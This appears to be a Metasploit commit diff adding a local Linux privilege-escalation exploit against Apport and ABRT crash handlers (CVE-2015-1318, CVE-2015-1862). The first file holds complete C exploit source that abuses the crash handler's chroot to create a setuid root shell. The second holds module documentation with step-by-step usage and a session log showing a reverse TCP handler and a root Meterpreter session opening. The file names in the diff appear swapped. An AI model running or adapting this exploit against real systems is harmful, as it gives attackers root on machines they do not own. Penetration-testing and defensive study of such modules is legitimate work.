Land rapid7#9399 a linux priv esc against apport and abrt

Author: h00die

data/exploits/cve-2015-1318/newpid

@@ -0,0 +1,143 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <signal.h>
+#include <err.h>
+#include <syslog.h>
+#include <sched.h>
+#include <linux/sched.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+ 
+//
+// Apport/Abrt Vulnerability Demo Exploit.
+//
+//  Apport: CVE-2015-1318
+//  Abrt:   CVE-2015-1862
+// 
+//   -- [email protected], April 2015.
+//
+// $ gcc -static newpid.c
+// $ ./a.out
+// uid=0(root) gid=0(root) groups=0(root)
+// sh-4.3# exit
+// exit
+//
+// Hint: To get libc.a,
+//  yum install glibc-static or apt-get install libc6-dev
+//
+
+//
+// Modified for Metasploit. Original exploit:
+// - https://www.exploit-db.com/exploits/36746/
+//
+ 
+int main(int argc, char **argv)
+{
+    int status;
+    pid_t wrapper;
+    pid_t init;
+    pid_t subprocess;
+    unsigned i;
+
+    // If we're root, then we've convinced the core handler to run us,
+    // so create a setuid root executable that can be used outside the chroot.
+    if (getuid() == 0) {
+        if (chown("sh", 0, 0) != 0)
+            exit(EXIT_FAILURE);
+ 
+        if (chmod("sh", 04755) != 0)
+            exit(EXIT_FAILURE);
+ 
+        return EXIT_SUCCESS;
+    }
+ 
+    // If I'm not root, but euid is 0, then the exploit worked and we can spawn
+    // a shell and cleanup.
+    if (setuid(0) == 0) {
+        system("id");
+        system("rm -rf exploit");
+        execlp("sh", "sh", NULL);
+ 
+        // Something went wrong.
+        err(EXIT_FAILURE, "failed to spawn root shell, but exploit worked");
+    }
+ 
+    // It looks like the exploit hasn't run yet, so create a chroot.
+    if (mkdir("exploit", 0755) != 0
+     || mkdir("exploit/usr", 0755) != 0
+     || mkdir("exploit/usr/share", 0755) != 0
+     || mkdir("exploit/usr/share/apport", 0755) != 0
+     || mkdir("exploit/usr/libexec", 0755) != 0) {
+        err(EXIT_FAILURE, "failed to create chroot directory");
+    }
+ 
+    // Create links to the exploit locations we need.
+    if (link(*argv, "exploit/sh") != 0
+     || link(*argv, "exploit/usr/share/apport/apport") != 0        // Ubuntu
+     || link(*argv, "exploit/usr/libexec/abrt-hook-ccpp") != 0) {  // Fedora
+        err(EXIT_FAILURE, "failed to create required hard links");
+    }
+ 
+    // Create a subprocess so we don't enter the new namespace.
+    if ((wrapper = fork()) == 0) {
+ 
+        // In the child process, create a new pid and user ns. The pid
+        // namespace is only needed on Ubuntu, because they check for %P != %p
+        // in their core handler. On Fedora, just a user ns is sufficient.
+        if (unshare(CLONE_NEWPID | CLONE_NEWUSER) != 0)
+            err(EXIT_FAILURE, "failed to create new namespace");
+ 
+        // Create a process in the new namespace.
+        if ((init = fork()) == 0) {
+ 
+            // Init (pid 1) signal handling is special, so make a subprocess to
+            // handle the traps.
+            if ((subprocess = fork()) == 0) {
+                // Change /proc/self/root, which we can do as we're privileged
+                // within the new namepace.
+                if (chroot("exploit") != 0) {
+                    err(EXIT_FAILURE, "chroot didnt work");
+                }
+ 
+                // Now trap to get the core handler invoked.
+                __builtin_trap();
+ 
+                // Shouldn't happen, unless user is ptracing us or something.
+                err(EXIT_FAILURE, "coredump failed, were you ptracing?");
+            }
+ 
+            // If the subprocess exited with an abnormal signal, then everything worked.
+            if (waitpid(subprocess, &status, 0) == subprocess)    
+                return WIFSIGNALED(status)
+                        ? EXIT_SUCCESS
+                        : EXIT_FAILURE;
+ 
+            // Something didn't work.
+            return EXIT_FAILURE;
+        }
+ 
+        // The new namespace didn't work.
+        if (waitpid(init, &status, 0) == init)
+            return WIFEXITED(status) && WEXITSTATUS(status) == EXIT_SUCCESS
+                    ? EXIT_SUCCESS
+                    : EXIT_FAILURE;
+ 
+        // Waitpid failure.
+        return EXIT_FAILURE;
+    }
+ 
+    // If the subprocess returned sccess, the exploit probably worked,
+    // reload with euid zero.
+    if (waitpid(wrapper, &status, 0) == wrapper) {
+        // All done, spawn root shell.
+        if (WIFEXITED(status) && WEXITSTATUS(status) == 0) {
+            execl(*argv, "w00t", NULL);
+        }
+    }
+ 
+    // Unknown error.
+    errx(EXIT_FAILURE, "unexpected result, cannot continue");
+}

data/exploits/cve-2015-1318/newpid.c

@@ -0,0 +1,73 @@
+## Description
+
+  This module attempts to gain root privileges on Ubuntu and Fedora systems by invoking the default coredump handler inside a namespace ("container").
+
+
+## Vulnerable Application
+
+  Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are vulnerable, due to a feature which allows forwarding reports to a container's Apport by changing the root directory before loading the crash report, causing `usr/share/apport/apport` within the crashed task's directory to be executed.
+
+  Similarly, Fedora is vulnerable when the kernel crash handler is configured to change root directory before executing ABRT, causing `usr/libexec/abrt-hook-ccpp` within the crashed task's directory to be executed. Fedora's crash handler was reportedly configured to chroot ABRT by default between April and August 2014.
+
+  In both instances, the crash handler does not drop privileges, resulting in code execution as root.
+
+  This module has been tested successfully on:
+
+  * Apport 2.14.1 on Ubuntu 14.04.1 LTS x86 and x86_64
+  * ABRT on Fedora 19 and 20 x86_64
+
+  To test Fedora 20, disable SELinux, reboot, and modify `/proc/sys/kernel/core_pattern` to make use of the vulnerable `core_pattern` : `|/usr/sbin/chroot /proc/%P/root /usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e`
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. Do: `use exploit/linux/local/apport_abrt_chroot_priv_esc`
+  4. Do: `set SESSION [SESSION]`
+  5. Do: `check`
+  6. Do: `run`
+  7. You should get a new root session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+
+## Scenarios
+
+  ```
+  msf > use exploit/linux/local/apport_abrt_chroot_priv_esc
+  msf exploit(linux/local/apport_abrt_chroot_priv_esc) > set session 1
+  session => 1
+  msf exploit(linux/local/apport_abrt_chroot_priv_esc) > run
+
+  [!] SESSION may not be compatible with this module.
+  [*] Started reverse TCP handler on 172.16.191.244:4444 
+  [*] Writing '/tmp/.drY6cJZ' (887316 bytes) ...
+  [*] Writing '/tmp/.LtJvrgjXq' (207 bytes) ...
+  [*] Launching exploit...
+  [+] Upgraded session to root privileges ('uid=0(root) gid=1000(user) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare),1000(user)')
+  [*] Sending stage (857352 bytes) to 172.16.191.252
+  [*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.252:35552) at 2018-01-11 09:58:25 -0500
+  [+] Deleted /tmp/.drY6cJZ
+  [+] Deleted /tmp/.LtJvrgjXq
+
+  meterpreter > getuid
+  Server username: uid=0, gid=1000, euid=0, egid=1000
+  meterpreter > sysinfo
+  Computer     : 172.16.191.252
+  OS           : Ubuntu 14.04 (Linux 3.13.0-32-generic)
+  Architecture : x64
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
+  meterpreter > 
+  ```
+